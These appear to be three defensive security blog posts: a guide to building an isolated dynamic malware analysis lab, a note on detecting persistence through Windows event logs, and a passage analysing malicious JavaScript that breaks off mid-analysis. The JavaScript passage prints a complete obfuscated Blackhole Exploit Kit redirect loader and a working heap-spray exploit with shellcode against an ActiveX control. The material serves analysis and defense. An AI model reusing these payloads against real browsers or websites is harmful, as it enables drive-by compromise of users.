Thursday, February 14, 2013

Dynamic Malware Analysis


When studying malware for network defense, you have two options: static or dynamic analysis.  Static analysis requires a deep understanding of executables, low-level programming and the use of specialized tools for reverse engineering.  This is generally done in a lab environment with analysts breaking down API calls and casting debugging spells that makes the rest of us feel rather incompetent.  In other words, you need some serious skills for static malware analysis.  Dynamic malware analysis, on the other hand, requires only an elementary knowledge of APIs and coding in addition to expert level understanding of networking and virtual environments.  In today's post, we will focus on the latter, which while seemingly daunting, is surprisingly easy and straightforward as long as you can keep the whole thing in focus as you go about your tasks.

While Static Malware Analysis would yield the most complete understanding of a threat, most of the time, network defenders will need to know what to look for should a system be infected and what the network activity looks like.  Dynamic malware analysis provides a relatively quick and easy answer to the most important questions regarding a specific malware threat:
  • What does the malware do?
  • What is the threat that this malware presents to our environment?
  • How do I identify infected systems?
Dynamic Malware Analysis, as the name implies is always changing and varies greatly.  How I do dynamic malware analysis may not be how others do it and that's OK.   As such, I will describe one way of doing dynamic malware analysis using VMWare ESXi.  The intent is to highlight some techniques and describe some techniques for finding the quick answers to these questions.

I should note that there are of course tools and scripts all over the Internet that can help you do most of these tasks.  I'm sure there might even be a whole application that can complete dynamic malware analysis without having to configure too many things.  My approach is focused on understanding what is happening and controlling as many variables as possible.  Loading some kind of malware analysis toolbox can definitely make life easier, but I feel that one should know how to do something without relying too heavily on a particular tool.  

REQUIREMENTS
As stated above, you will need a very good grasp of networking and a general understanding of APIs and how programs work.  While this can be done in a non-virtual environment, it is much easier with tools like VMware ESXi and other virtualization platforms.  As such, a clear understanding of how virtualization works is also required.

So, here's a list:
  • A hefty system that can run multiple virtual machines.
  • Several working virtual machines running the operating system that is being targeted (usually Windows).
  • Either a host running Linux (easier) or Windows (harder) or a virtual machine running the same, on the same host.
  • Snapshots of the target virtual machines in known good states.

FIRST THINGS FIRST
The first thing to setup is your sandbox.  By definition, a sandbox is where you play, but more importantly, it is isolated from your normal working environment.  If at all possible, it is best to have your sandbox or virtual machine host separated from your production network.  It is not necessary though, but it completely removes the possibility of releasing malware into your production environment and may even be a requirement depending where you work.

For our purposes, we will have a VMware ESXi host running two virtual machines: A plain Windows XP system and a Linux system for analysis.  Additionally, the VMWare ESXi host will have a virtual switch that is not connected to a physical network adapter.  By default, ESXi will have a virtual switch named "vSwitch0" which is connected to your physical network adapter and is also used for your management network:

Virtual Switch: vSwitch0 
--------------------------
Virtual Machine Port Group - VM Network   |<-------> vmnic0 (Physical Adapter)
VMKernel Port - Management Network (vmk0) |
Port Group Label: "VM Network"            |

Create a new virtual switch named "vSwitch1" that has no physical adapters and add a port group and call it "Malware Network":

Virtual Switch: vSwitch1 
--------------------------
Virtual Machine Port Group - VM Network   |<-------> No adapters
Port Group Label: "Malware Network"       |
VLAN ID: None                             |

Some of the settings for vSwitch1 one should include:
Promiscious Mode: Accept
MAC Address Changes: Accept

After that is setup, ensure that your virtual machines are setup to use vSwitch1 instead of vSwitch0.  You should also add two network cards to your Linux system, one for the Malware Network and one for the regular network.  This allows you to do even more dynamic malware analysis by downloading malware components through your Linux system.

Windows XP
----------
Network Adapter 1 = Malware Network

Linux
-----
Network Adapter 1 = Malware Network
Network Adapter 2 = VM Network

Once this is setup, you will have a network that looks like this:

+----------+           +----------+
| Win XP   |<--------->| Linux    |<-------> NETWORK ACCESS
| Target   |           |          |
+----------+           +----------+

This gives you a lot of flexibility: you can run malware on the Windows XP target and observe the network activity on the Linux system.  Additionally, you can quickly access the network from the Linux system for things like DNS lookups and additional code and tool downloads.

THE SETUP
Windows XP is relatively easy to setup, so I won't go into detail for that.  There are tons of resources on the 'net to help with that.  Linux is also relatively easy, so grab your favorite distribution and get that installed.  There are some good software packages and configurations to load for each:

Windows
  • Sysinternals Suite (get the whole suite, just in case and install it): http://technet.microsoft.com/en-us/sysinternals/bb842062
  • Java (it's a good idea to install it, since most malware these days like it): http://www.java.com/en/download/index.jsp
  • Ollydbg (for quick looks): http://www.ollydbg.de
  • Wireshark: http://www.wireshark.org/
  • Create an administrative account with a password
  • Create a non-administrative account
  • Install/configure your network defenses*
  • DO NOT load the VMware Tools
  • Static IP address with Default Gateway and DNS server as the Linux IP address on the Malware Network.
* One thing to note: if your network defenses are up-to-snuff, you shouldn't have a lot of malware to worry about.  But this can also interfere with your dynamic malware analysis.  You may want to consider having a "non-protected" Windows VM as well as a "protected" one to see if the malware you are analyzing will work in your environment or not.  Since the focus of this post is dynamic malware analysis, we'll assume you have a "non-protected" version of Windows running in your VM.

Linux (note that most of these are built-in)
  • tcpdump (or wireshark if you like GUIs)
  • A kernel that allows routing ("Enable Routing" in most kernel configurations)
  • wget
  • netcat
  • apache (or another web server)
  • Static IP address on eth0 with the Default Gateway as the loopback address (127.0.0.1)
  • Static route on eth0 pointing to the loopback address

SNAPSHOTS 
Once you have a good configuration setup on both, take a snapshot.  A snapshot allows you to revert to a known good state, which is important between malware runs.  Over the years, I've found that I have to continually adjust my snapshots and have multiple snapshots depending on what I am doing.  There is no magic formula for this - you will have to just learn by doing and find that works best for you.  For example, I've found that having Diskmon, Process Explorer and Process Monitor running on the Windows system with established filters works for me.  Basically if you find that you keep setting things up before running the malware on the target box, you'll want to take a snapshot with those things setup just before you load and run the malware.

Snapshots are not so critical on the Linux system, but your mileage may vary, so take one anyway.

HIDING THE HOUSE
There are breeds of malware that have virtualization detection built in and they may or may not run depending if it detects a virtual environment.  If this is a concern, you can modify the .vmx file of your Windows target system and add some parameters that will essentially hide the fact that this is running in a virtual environment.  The following lines do this to some extent.  Note that there are many ways to detect if you are in a virtual environment, so this is not a 100% solution.  For particularly sensitive malware, the only solutions are to go physical or do static malware analysis.  Note that I have yet to run into this problem.

isolation.tools.getPtrLocation.disable = "TRUE"
isolation.tools.setPtrLocation.disable = "TRUE"
isolation.tools.setVersion.disable = "TRUE"
isolation.tools.getVersion.disable = "TRUE"
monitor_control.disable_directexec = "TRUE"
monitor_control.disable_chksimd = "TRUE"
monitor_control.disable_ntreloc = "TRUE"
monitor_control.disable_selfmod = "TRUE"
monitor_control.disable_reloc = "TRUE"
monitor_control.disable_btinout = "TRUE"
monitor_control.disable_btmemspace = "TRUE"
monitor_control.disable_btpriv = "TRUE"
monitor_control.disable_btseg = "TRUE"

LINUX SETUP
Setting up your Linux environment can vary by distribution, so here are some generalized items to setup:


  • tcpdump running constantly and saving to a file.  The idea is to capture everything for data collection and further analysis.  This should also be running in a different terminal window.
    • tcpdump -nn -i eth0 -s1600 -U -w capture.pcap
  • Another terminal window that you can use to query the capture.pcap file as needed.  For me, I like to see the packets as they come in, so in that terminal window, I run:
    • tail -f capture.pcap | tcpdump -nn -r - -vvX
  • Note that the above command should be run immediately after starting the tcpdump command.
  • Or you can bypass all the tcpdump business by simply running a GUI version of Wireshark.

TESTING ALL SYSTEMS
Once your snapshots are all setup, it's time to do some communication checks.

For this post, we'll assume the following setup:

Windows Target System
---------------------
IP: 10.0.0.1
MASK: 255.255.255.0
GATEWAY: 10.0.0.2
DNS: 10.0.0.2

Linux System (eth0)
-------------------
IP: 10.0.0.2
MASK: 255.255.255.0
GATEWAY: 127.0.0.1

First, on the Windows system, send a ping to 10.0.0.2 and observe the response.  On the Linux host, observe the incoming and response ICMP packets in Wireshark or tcpdump windows.
On the Linux system, send a ping to 10.0.0.1 and observe the outbound and response ICMP packets in Wireshark or tcpdump windows.

Next, again on the Windows system, ensure that your tools for monitoring your system (i.e. Process Monitor).

FIRE THE MALWARE
On the Windows system, run the malware.  Switch over to your Linux VM and see if any network traffic was generated.  The setup above ensures that any DNS queries or connection attempts are captured in the Linux system by pointing all traffic towards the Linux VM.  The first thing you will notice is that there is a lot of traffic already captured.  This is because Windows is particularly chatty on the network.  Review the captured packets and look for any DNS queries (Wireshark filter: "udp.port eq 53") or TCP connection attempts (Wireshark filter: "tcp.flags.syn == 1").

What you do next depends on what happened.  First, review the network traffic.

DNS Queries - if there are DNS queries captured:
  1. Take note of the domain being resolved.
  2. Revert the Windows target system to the known good state
  3. Edit the Windows hosts file (C:\WINDOWS\SYSTEM32\drivers\etc\hosts) and add the domain to point to the Linux system.  For example, if the domain is "www.abc.com", add an entry to the hosts file like so: "www.abc.com 10.0.0.2"
  4. Run the malware again.
  5. Review what happens differently.
TCP Connection Attempts - if there are SYN packets to some Internet IP addresses:
  1. Take note of the IP address being attempted.
  2. Take note of the port being connected to.
  3. For example, let's assume it tried to connect to 1.2.3.4 TCP port 8080.
  4. Create the 1.2.3.4 address on the Linux VM as another loopback interface: ifconfig lo:1 inet 1.2.3.4 netmask 255.255.255.255
  5. This adds another interface (lo:1) to the system with an IP address of 1.2.3.4.
  6. Setup a netcat listener on port 8080: nc -n -l -k 8080
  7. Revert the Windows target system to the known good state
  8. Run the malware again.
  9. Review what happens differently.
RINSE AND REPEAT
As you revert the Windows target system and run the malware, observe what happens and see if you can identify what the malware is doing by:
  • Analyzing the registry, file, process information collected by the Sysinternals suite
  • Review the collected network traffic and identify any second stage downloads or command and control channels.
  • Second stage downloads can be downloaded manually by sending the exact GET request observed from the malware.
  • Rinse and repeat with the second stage download.

FINAL REPORT
At the end of a dynamic malware analysis task, you should know enough to identify what the malware does to the system, what it does on the network, what sort of threat it presents to your environment and how to find infected systems.  This type of information is invaluable to your incident responders.

Thanks for reading this post - I hope it was useful and helps you find your own techniques for dynamic malware analysis.  In future iterations of this topic, we'll explore ways to identify and execute malicious JavaScript safely.

Thursday, November 22, 2012

Identifying Compromise with the Windows Event Log

Windows event logs are primarily viewed a means to confirm a compromise and explore the depth and width of a compromise. Typically, only after having been alerted by IDS, HIDS, or AV will an incident responder examine host event logs. Until recent changes in Vista & Server 2K8, this information could be seen as unmanageable and unruly. Today, I'm advocating for the use of Windows Event Logs as a source for initial identification of security incidents, instead of an after thought.

Detecting Persistence
I'm part of team whose role is to perform penetration tests and design mitigative strategies based on our ability to break in, persist, and move laterally. Most of the time, when we land on a machine inside of the target network, we utilize some form of persistence mechanism:

  1. Add a registry setting to HKLM/.../Run or RunOnce
  2. Attempt to create a service which runs our trojan
  3. Add a task in TaskScheduler to execute our trojan
  4. Open the Windows Firewall, enable Remote Desktop/ Remote Assistance, and add a user
  5. Copy our trojan into the "Auto-Start" directory
Let's take a moment and analyse how each of the above actions is captured in the Windows Event Logs (thank you Randy Franklin):
  1. Event 4657: Registry Changes
  2. Event 4697: Service installed on a system
  3. Event 4698: A Scheduled Task was created
  4. Event 4964: Firewall Exception Added, Event 4720: User Created
  5. Event 4657: This action will trigger registry changes in the Run hive
Now, let's not get carried away! I mean, Windows registry changes happen A LOT on end user workstations. Looking at all of the registry changes as potential compromises would be like documenting each port scan of your external IP space - not helpful. With this in mind, we need to filter for changes to specific hives which should generally remain static. We can also watch out for changes to any of the hives examined by "AutoRuns.exe"; a tool created by Mark Russinovich to identify persistent applications in Windows. 

Getting the Logs Together
Let's talk about the bigger challenge: collecting events from EACH workstation in a domain into a central location. There are a few approaches that would work, some more scalable than others. Your organizations bottom line will dictate what type solution you can implement, but just collecting key events centrally is a step in the right direction. If your organization has hardware sitting around, you can implement the first 2 solutions for free (plus labor):

  • Powershell or WMI: pull specific events
    • Easy, quick, could provide spotty data depending on pull frequency
  • Event Log Forwarding: push events to central log management device
    • Built into Windows, manageable via GPO, almost real-time, encryptable
  • Splunk or Snare agent: push events to central log management device
    • Optimal, real-time, encryptable, relatively expensive 

Not Just for Persistence!
Other uses of event logs included, but are not limited to:
  • Suspicious Share usage (think pass-the-hash/psexec.exe)
  • Local administrative account creation
  • Local administrator brute force attempts
  • Use of "net" tools on non-network admin boxes
  • Suspicious internal RDP sessions

Caveat
Log management is certainly not a catch all. Attackers can and will find ways to compromise networks that will go undetected by event log monitoring. Event log monitoring should be view as a essential compromise detection component of a defense-in-depth approach to network security. That being said, for an attacker to persist on a Windows machine, it is extremely likely that they will trigger an event listed above.

Thursday, November 15, 2012

Malicious JavaScript

Often times, malware enters your network through your clients.  One of the most prevalent attack vectors is through browser vulnerabilities.  These are usually manifested in malicious JavaScript that aims to either redirect the browser to malicious website that is hosting exploit code or an exploit itself.  The Blackhole Exploit Kit has been making the news and flooding non-malicious but exploitable websites with redirect code through obfuscated JavaScript that will cause your web browser to be redirected through a series of other websites that determine your software versions and serve you the appropriate exploit for your system.  This is all automated and can be deployed by non-technical attackers.  

But what does "obfuscated" really mean?  For me, if I can't tell just by looking at it what it is trying to do, then it is obfuscated.  As a network defender, I've encountered my share of obfuscated JavaScript.  It is important to note that there are legitimate reasons for having obfuscated JavaScript on your website (saving bandwidth, hiding proprietor code, etc).  This post aims to highlight the key differences between legitimate, redirecting and malicious obfuscated JavaScript code and demonstrate quick ways to analyze and ferret out what is what.

LEGITIMATE CODE
There is no real substitute to experience.  If you are looking at obfuscated JavaScript and you are a network defender, your first instinct is to distrust it.  Over time, the legitimacy of the code will stand out and the unusual ones will become more and more obvious.  But, we can start with the easy ones.

Yahoo and Google make up a lot of the JavaScript code out there.  jQuery, undoubtedly one of the more popular JavaScript frameworks is served straight from Google.  Sure, some websites download a particular version and host it for their own use, but the smart website coder would rather point to Google's hosting of jQuery for a number of reasons.  Saving bandwidth and automatic updating are just some of the reasons.  Yahoo also serves up several JavaScript frameworks, including the Yahoo User Interface (YUI).  JavaScript that is served by Yahoo and Google can generally be trusted.  After reviewing several samples over the wire, it becomes easy to see the patterns.

But it is important to know that exploit kits such the Blackhole Exploit Kit (BEK) automatically add their malicious code to multiple files on vulnerable websites.  BEK code tends to stick out since it does not match the general pattern of other JavaScript frameworks.  It tends to consume only a few, albeit long, lines of code and usually has large amount of what appear to be meaningless numbers or letters followed by a decoding sequence.  I've seen my share of YUI and jQuery libraries with BEK JavaScript code appended or pre-pended to it.

In short, trust some sources, but not the frameworks.

REDIRECT CODE
JavaScript that redirects will usually go through several layers of obfuscation.  The structure generally tends to look like this:

Some testing code
Large array of numbers or letters
De-obfuscation loops
Execution code

The last line, execution code, described JavaScript execution, such as "eval" or some obfuscated version of it.  As with legitimate code, over time, you can easily identify redirecting code based on the structure and the layouts.

Consider this bit of code that was appended to the end of an otherwise legit copy of the jQuery JavaScript library v1.4.4:

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;689!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](w[j]*1+40);}if(f)z=s;e(z);


EXPLOIT CODE
JavaScript exploits are usually Heap Spray attacks.  They throw the payload all over the heap and then exploit the vulnerable components of JavaScript, hoping to change EIP to their exploit code and thus executing the payload.  There are a couple of things about JavaScript exploits that tend to stick out: they use NOPs (see below) and cannot obfuscate the payload.  Note that this does not mean the code is not obfuscated.  It may go through several iterations before actually attempting to render the payload in memory, but when it is rendered, it cannot be obfuscated itself.  In other words, it will stick out.  

NOP SLEDS
NOP (Null OPeration) is an assembly command that does nothing.  If an attacker has placed his payload, which contains assembly commands, in memory, but is not sure exactly where it is in memory, she may pad the beginning of the payload with NOP commands (0x90) so if the instruction pointer (EIP) is changed to the general location, the target system will execute NOP commands until it hits the main payload.  This increases the chances of the payload being executed, especially if the attacker is not sure where the exploit code is in memory, as is the case with Heap Spray attacks.

Here is an example of a malicious JavaScript with a payload, attempting to exploit a vulnerable ActiveX component:

function second()

{
        var yuwergufiudf = 0x0F0F0F0F;
        var vhusdifsdifdbwfbsdf = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB
%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE
%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B
%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB
%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C
%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353
%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F
%u3370%u722E%u6165%u696C%u657A%u682E%u2F6B%u6F6C%u6967%u2F6E%u6E69%u6564%u2E78
%u6870%u3F70%u6572%u3D67%u0001");
        var uyywifssdfdsf = 0x400000;
        var afddssddsfsdfxc = vhusdifsdifdbwfbsdf.length * 2;
        var erwfrhhrhfgSize = uyywifssdfdsf - (afddssddsfsdfxc+0x38);
        var erwfrhhrhfg = unescape("%u0D0D%u0D0D");
        erwfrhhrhfg = retyttyuty(erwfrhhrhfg,erwfrhhrhfgSize);
        iusdiuiudfsd = (yuwergufiudf - 0x400000)/uyywifssdfdsf;
        memory = new Array();
        for (i=0;i<iusdiuiudfsd;i++)
        {
                memory[i] = erwfrhhrhfg + vhusdifsdifdbwfbsdf;
        }
        var target = new ActiveXObject("DirectAnimation.PathControl");
        target.KeyFrame(0x40000E0A, new Array(1), new Array(1));
}

UNOBFUSCATING
The lovely thing about scripting languages is that they execute regardless of the environment.  Unlike executable malware analysis, you can take Javascript code and run it in any environment and it will run, as long as certain dependencies are met.  Luckily, there are a lot of tools available for doing just this.  One of my favorite is called Malzilla (http://malzilla.sourceforge.net/).  Malzilla is a Windows based tool that can not only execute Javascript, it can also re-format, debug and analyze the resulting "stuff" that it generates.

Let's take the first example above of redirecting JavaScript.  First, we fire up Malzilla and paste the code into the "Decoder" tab of Malzilla.  Ensure that the "Replace eval() with" is selected and then hit the "Format Code" button.  This will give us something more readable.

 c=3-1;

 i=c-2;
 if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try
 {
   Boolean().prototype.q
 }
 catch(egewgsd)
 {
   f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
   v="ev"+"a"+"l";
 }
 if(v)e=window[v];
 w=f;
 s=[];
 r=String;
 for(;689!=i;i+=1)
 {
   j=i;
   s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
 }
 if(f)z=s;
 e(z);


We can do a quick review of the code in this script and identify the logic structures.  The "if" statement starting on the third line will execute if it is in a browser environment and it also does a little math test as an additional test.  We can change the code a little to ferret out what we really want to find out: what is this code trying to do?  Also, the "for" loop in the bottom is a decoding loop, building the variable "s".  Finally, the last line is actually an "eval" against the "z" variable, which is a copy of "s", done in the second to last line.  Finally, we can change the last "eval" to a "document.write":

c=3-1;i=c-2;


f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i57i15i71i76i16i6i76i68i72i78i73i75i68i76i70i64i6i65i75i5i68i71i75i76i6i71i74i63i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');
v="ev"+"a"+"l";
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;689!=i;i+=1)
{
  j=i;
  s+=r["fr"+"omC"+"harCode"](w[j]*1+40);
}
if(f)z=s;
//e(z);
document.write(z);

When we run this, we find code that will redirect the web browser to http[:]//a7ot8.tlpvqsltnh.is-lost.org/g/", which when this code was captured was a starting point for a Blackhole Exploit Kit (BEK) attack.

ATTACK PAYLOAD
Now, let's look at the second example we have: a direct JavaScript exploit.  Remember, these exploits can come with multiple obfuscations, but the final attack payload cannot be obfuscated.  I've seen JavaScript attacks that go through multiple rounds of obfuscations before revealing the final payload and attack.  So you may need to rinse and repeat until you get to the bottom of a JavaScript attack.

In the example above, we can quickly identify the payload since it begins with a NOP sled: "%u9090%u9090" and completely ignore the rest of the script.  A quick Google of "DirectAnimation.PathControl" shows that this is most likely an exploit against CVE-2006-4446 (sorry, this is an old sample).  But let's focus on the payload to figure out what an infected system would do:

